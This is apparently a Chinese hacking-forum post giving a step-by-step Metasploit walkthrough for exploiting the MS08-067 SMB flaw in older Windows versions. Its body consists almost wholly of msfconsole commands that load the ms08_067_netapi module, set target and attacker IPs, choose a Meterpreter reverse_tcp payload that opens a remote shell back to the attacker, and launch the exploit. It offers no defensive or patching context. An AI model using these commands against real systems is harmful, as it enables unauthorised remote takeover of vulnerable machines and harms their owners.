请选择 进入手机版 | 继续访问电脑版
设为首页收藏本站 今天是: 2020-11-29    美好的一天,从现在开始
开启辅助访问      
切换到窄版

Waylee黑技术

 找回密码
 注册会员
搜索
热搜: 天龙 运维 kali
查看: 629|回复: 0
收起左侧

Metasploit之MS08-067远程执行代码漏洞利用过程

[复制链接]

203

主题

232

帖子

942

积分

管理员

Rank: 9Rank: 9Rank: 9

积分
942
发表于 2020-7-6 22:59:36 | 显示全部楼层 |阅读模式
使用ms08_067_netapi攻击模块。
攻击目标445端口
目标IP:RHOST攻击机IP:LHOST
受影响目标系统 Windows 2000;XP;Server 2003;Vista;Server 2008;7 Beta

配置exploit
msfconsole
msf > use exploit/windows/smb/ms08_067_netapi
msf exploit(ms08_067_netapi) > set rhost 192.168.2.242
回显内容rhost => 192.168.2.242

查看可攻击目标信息
show targets
set target 34

有效攻击载荷
show payloads

配置payload
payload只需要配置监听返回会话的IP;
msf exploit(ms08_067_netapi) > set payload windows/meterpreter/reverse_tcp
set lhost 192.168.2.222

查看攻击选项
show options

执行漏洞
exploit



高级模式
您需要登录后才可以回帖 登录 | 注册会员

本版积分规则

为兴趣而生,注册一起交流。 立即登录云玩 立即注册

QQ|手机版|Waylee黑技术 ( 浙ICP备15015590号-1 )

|浙公网安备33048102000118号

GMT+8, 2020-11-29 15:52 , Processed in 0.061240 second(s), 26 queries .

Powered by Discuz! X3.4 Licensed

Copyright © 2001-2020, Tencent Cloud.

快速回复 返回顶部 返回列表